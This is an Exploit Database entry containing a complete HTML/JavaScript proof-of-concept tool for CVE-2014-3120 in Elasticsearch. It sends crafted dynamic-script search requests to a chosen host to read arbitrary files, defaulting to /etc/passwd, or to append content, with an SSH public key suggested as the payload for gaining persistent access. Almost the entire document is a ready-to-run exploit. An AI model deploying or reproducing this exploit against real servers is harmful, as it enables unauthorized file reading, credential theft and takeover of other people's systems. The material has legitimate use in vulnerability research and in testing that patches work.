Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
<!-- ##CVE-2014-3120 Elastic Search Remote Code Execution This project demonstrates the CVE-2014-3120 vulnerability/misconfiguration. It allows you to read from and append to files on the system hosting ES, provided the user running ES has access to them. ###Notes This does not require a web server. Save it locally and run it from a browser. Discovery and vuln publishing credit goes to: @BvdBijl - http://bouk.co/blog/elasticsearch-rce/ --> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- Latest compiled and minified CSS --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet"> <!-- Optional theme --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css" rel="stylesheet"> <style> body { padding-top: 50px; } .starter-template { padding: 40px 15px; text-align: center; } </style> </head> <script src="http://code.jquery.com/jquery-1.11.1.min.js"></script> <script> function es_inject() { var read_file; var write_file; read_file = function(filename) { return ("import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"" + filename + "\")).useDelimiter(\"\\\\Z\").next();"); }; write_file = function(filename) { return ("import java.util.*;\nimport java.io.*;\nPrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\"" + filename + "\", true)));\nwriter.println(\"" + document.getElementById("element_2").value + "\");\nwriter.close();"); }; $(function() { var payload, filename, files, host, _i, _len; files = [document.getElementById("element_3").value]; payload = { "size": 1, "query": { "filtered": { "query": { "match_all": {} } } }, "script_fields": {} }; if (document.getElementById("element_4").checked) { for (_i = 0, _len = files.length; _i < _len; _i++) { filename = files[_i]; payload["script_fields"][filename] = { "script": write_file(filename) }; } } else { for (_i = 0, _len = files.length; _i < _len; _i++) { filename = files[_i]; payload["script_fields"][filename] = { "script": read_file(filename) }; } } $.getJSON("http://" + document.getElementById("element_1").value + ":9200/_search?source=" + (encodeURIComponent(JSON.stringify(payload))) + "&callback=?", function(data) { var content, contents, hit, _j, _len1, _ref, _results; console.log(data); _ref = data["hits"]["hits"]; _results = []; for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) { hit = _ref[_j]; _results.push((function() { var _k, _len2, _ref1; _ref1 = hit["fields"]; for (filename in _ref1) { contents = _ref1[filename]; document.getElementById("script_results").innerHTML += ("<h2>" + filename + "</h2>"); for (_k = 0, _len2 = contents.length; _k < _len2; _k++) { content = contents[_k]; document.getElementById("script_results").innerHTML += (content); } document.getElementById("script_results").innerHTML += ("<hr>"); //document.getElementById("script_results").innerHTML += (document.getElementById("element_4").checked); } })()); } return _results; }); }); }; //es_inject(); </script> <body> <div class="navbar navbar-inverse navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">Elastic Inject</a> </div> </div> </div> <div class="container"> <div class="starter-template"> <h2>CVE-2014-3120 Elastic Search Remote Code Execution</h2> <p class="lead">This will read and write files from an ES instance vulnerable to CVE-2014-3120.<br> This is for demonstration purposes only.</p> </div> <div class="col-md-8"> <!-- <form id="ES_Inject" action="" method=""> /--> <label for="element_1">ES_IP_Address: </label><br/> <input id="element_1" name="element_1" class="element text medium" type="text" maxlength="255" value="127.0.0.1"/> <br/> <label for="element_3">File to read/append to: </label><br/> <input id="element_3" name="element_3" class="element text medium" type="text" maxlength="255" value="/etc/passwd"/> <br/> <label class="description" for="element_2">Content to append: </label><br/> <textarea id="element_2" name="element_2" class="element textarea large">YOUR_SSH_PUBLIC_KEY or SOMETHING</textarea> <br/> <!-- <input id="element_4" type="radio" name="es_action" value="read" checked>READ<br/> /--> <input id="element_4" type="checkbox" name="es_action" value="write">WRITE<br/> <!-- <input id="saveForm" class="button_text" type="submit" name="submit" value="Submit" onClick="es_inject();"/> /--> <button onclick="es_inject();">Click me</button> <!-- </form> /--> <h3>Your file contents should appear below if a read is successful. </h3> <div id="script_results"> </div> </div> <div class="col-md-8"> Original vulnerability discovered by <a href="https://twitter.com/bvdbijl"> @BvdBijl</a> - <a href="http://bouk.co/blog/elasticsearch-rce/">http://bouk.co/blog/elasticsearch-rce/</a> </div> </div><!-- /.container --> <script src="//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script> </body></html>
